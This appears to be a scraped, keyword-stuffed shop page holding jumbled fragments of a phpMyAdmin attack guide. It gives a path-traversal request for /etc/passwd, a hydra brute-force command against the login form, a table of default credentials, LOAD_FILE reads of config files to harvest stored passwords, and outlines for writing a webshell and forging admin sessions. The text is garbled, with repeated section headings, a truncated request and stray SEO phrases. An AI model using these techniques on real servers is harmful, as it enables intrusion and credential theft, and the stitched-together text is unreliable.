Skip to content

Cart

Your cart is empty

Phpmyadmin Hacktricks | Verified

POST /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd Improper sanitization of the target parameter. Patched in 4.8.5. Test instances still exist. Part 3: Post-Authentication to Remote Code Execution (RCE) Once logged in, the game is over for the server. 3.1 Into Outfile Method (Most Reliable) If the database user has FILE privilege, you can write a webshell.

/var/lib/phpmyadmin/config.inc.php /etc/phpmyadmin/config.inc.php /usr/share/phpmyadmin/config.inc.php phpmyadmin hacktricks verified

Works on Apache with default www-data permissions. Fails if secure_file_priv is set or web directory not writable. 3.2 General Log File Injection (Bypasses secure_file_priv) When secure_file_priv is NULL, use this method. POST /phpmyadmin/index

hydra -l root -P /usr/share/wordlists/fasttrack.txt target http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:token" Rate-limit warning: phpMyAdmin 5.0+ introduces brute-force protection via $cfg['LoginCookieValidity'] , but default is 1800 seconds – still bypassable with slow brute force. In phpMyAdmin 4.8.0–4.8.4, an LFI vulnerability allowed attackers to read arbitrary files without logging in. Part 3: Post-Authentication to Remote Code Execution (RCE)

LOAD_FILE('/etc/phpmyadmin/config.inc.php'); Look for $cfg['Servers'][$i]['password'] . If $cfg['blowfish_secret'] is weak or default, you can decrypt session cookies and impersonate admin.

| Username | Password | |----------|----------| | root | root | | root | (blank) | | root | toor | | admin | (blank) | | pma | pmapassword |